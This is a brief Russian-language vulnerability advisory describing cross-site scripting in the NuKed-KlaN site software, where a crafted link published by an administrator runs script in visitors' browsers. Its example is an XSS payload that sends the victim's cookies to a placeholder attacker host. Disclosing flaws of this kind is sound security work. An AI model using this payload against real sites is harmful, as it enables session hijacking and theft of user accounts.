Программа: NuKed-KlaN
Межсайтовое выполнение сценариев обнаружено в NuKed-KlaN. Удаленный атакующий может получить доступ к важным данным пользователей.
Удаленный атакующий может послать специально сформированный URL администратору. Если администратор разрешает публикацию этой ссылки, то удаленный атакующий может выполнить произвольный HTML код в браузере жертвы.
Пример:
[Name of website] [a lot of espaces] \'/>\"/><script></script><script>document.location=
\'http://[attacker]/cookie.php?cookie=\' +win dow.document.cookie;</script>
